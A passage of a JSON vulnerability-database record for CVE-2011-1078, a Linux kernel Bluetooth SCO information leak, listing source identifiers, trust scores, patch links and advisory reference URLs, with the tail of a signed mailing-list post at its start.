(GNU/Linux)\n\niQIcBAEBAgAGBQJN3I4aAAoJEBv4PF5U/IZAaa4P/j+l40Mp6naHByZt3jpwNWSA\nRN/jkkrYnYNDyT7crB+/DOdu84zalYa2KqfffOd/faV9+NSCBayjJ5c+FvVgeTay\nIl8elfcWP/uK0BXJn2xVb7YAsLpIe0HRlhxe72ZqcT4Yxo1/IBnEpUS56JRd2tlA\nk7x7dbj+smlzlM4qiXQy1F6LNyDqoGDUKNohQHUoyQ5dGq/gdi3C7EnUs4Nx9vjK\nRU1HUWLXB4qm7JpoK6o3u6Hpe0ynZm74tYvTi0XhayGXGevaBvIQuEWqhY6gZF1P\nv6a5gvBQC2pRIQXAVUbAhjoXpuF5jahTgicLdJanDqLfhefQ3qV11Ahvui2lzZuT\niKbMVGzO/azPLzskH8YNBq6drFPX2ZqRsxGmrTdzEtLWnJCN6nBBe4kF6C3z5T1A\n1ez4/F+OhNl2wnimq3CxiyfXun9WWs6IlULpqsKgJjE4bItg5a8+zTYGjkhQxX+X\nfPzO1xZCtQK4i+59Ejs5FwIfps0fA0m8c1Z5bnIaj4Q+0X5sJt2kwws8yrQKoOH1\neKGOgRqM70rOnyW/TQtXDGnTC4+vCCv89UjZUpG+sxZtWUxeh8CL2scUyceTeSNC\nIS2+EgvilN+a3hQlYJH4YNshmQCtJDp7qMTLaXLHM9hoV1L383nbJV4AtrFlcsCO\nKRI5f0ds95H6TsEoTSmO\n=gx2x\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-1078",
        "trust": 2.9
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/03/01/10",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "51749",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "47804",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20110301 RE: CVE REQUEST: KERNEL: TWO BLUETOOTH AND ONE EBTABLES INFOLEAKS/DOSES",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "44682",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46003",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45707",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45392",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "44889",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "44975",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46824",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "44543",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "44792",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45997",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45509",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404",
        "trust": 0.6
      },
      {
        "db": "HITACHI",
        "id": "HS12-005",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "109259",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "109299",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106798",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105266",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105083",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "101680",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "id": "VAR-201206-0026",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.225
  },
  "last_update_date": "2023-02-11T22:29:47.621000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ASA-2011-208",
        "trust": 0.8,
        "url": "http://downloads.avaya.com/css/p8/documents/100145416"
      },
      {
        "title": "ChangeLog-2.6.39",
        "trust": 0.8,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39"
      },
      {
        "title": "Bluetooth: sco: fix information leak to userspace",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/c4c896e1471aec3b004a693c689f60be3b17ac86"
      },
      {
        "title": "linux/kernel/git/torvalds/linux-2.6.git / commit",
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=c4c896e1471aec3b004a693c689f60be3b17ac86"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Bug 681259",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=681259"
      },
      {
        "title": "RHSA-2011:0833",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-0833.html"
      },
      {
        "title": "RHSA-2012:1156",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2012-1156.html"
      },
      {
        "title": "VMSA-2012-0001",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2012-0001.html"
      },
      {
        "title": "linux-3.4.4",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=43488"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/c4c896e1471aec3b004a693c689f60be3b17ac86"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=681259"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/03/01/10"
      },
      {
        "trust": 1.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=c4c896e1471aec3b004a693c689f60be3b17ac86"
      },
      {
        "trust": 1.6,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2012-1156.html"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-0833.html"
      },
      {
        "trust": 1.0,
        "url": "http://downloads.avaya.com/css/p8/documents/100145416"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1078"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1078"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/51749"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44543"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44682"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44792"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44889"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44975"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45392"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45509"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45707"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45997"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46003"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46824"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/47804"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1078"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1079"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1080"
      },
      {
        "trust": 0.4,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.hds.com/products/storage-software/hitachi-device-manager.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1170"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1172"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0726"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1494"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1495"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1093"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1171"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1020"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1493"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1160"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1180"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0711"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1163"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4649"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1573"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0695"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1044"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2484"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1581"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1585"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1577"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1771"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1833"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1478"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1598"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1593"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1173"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1745"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1746"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1090"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/company/jobs/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2522"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1780"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2525"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1746"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2192"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1745"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1936"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/go/selfsupport-download"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2519"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009143"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1763"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2482"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1678"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2517"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1079"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009142"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1593"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2694"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2183"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1256-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2479"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1767"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1479"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1768"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1748"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1212-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.38-1209.15"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0463"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1770"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-fsl-imx51/2.6.31-610.28"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4162"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3859"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4163"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4242"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1010"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4076"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4077"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4805"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4175"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4251"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1204-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1082"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4243"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4158"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1012"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1476"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1477"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3875"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-404"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1078"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-002827"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
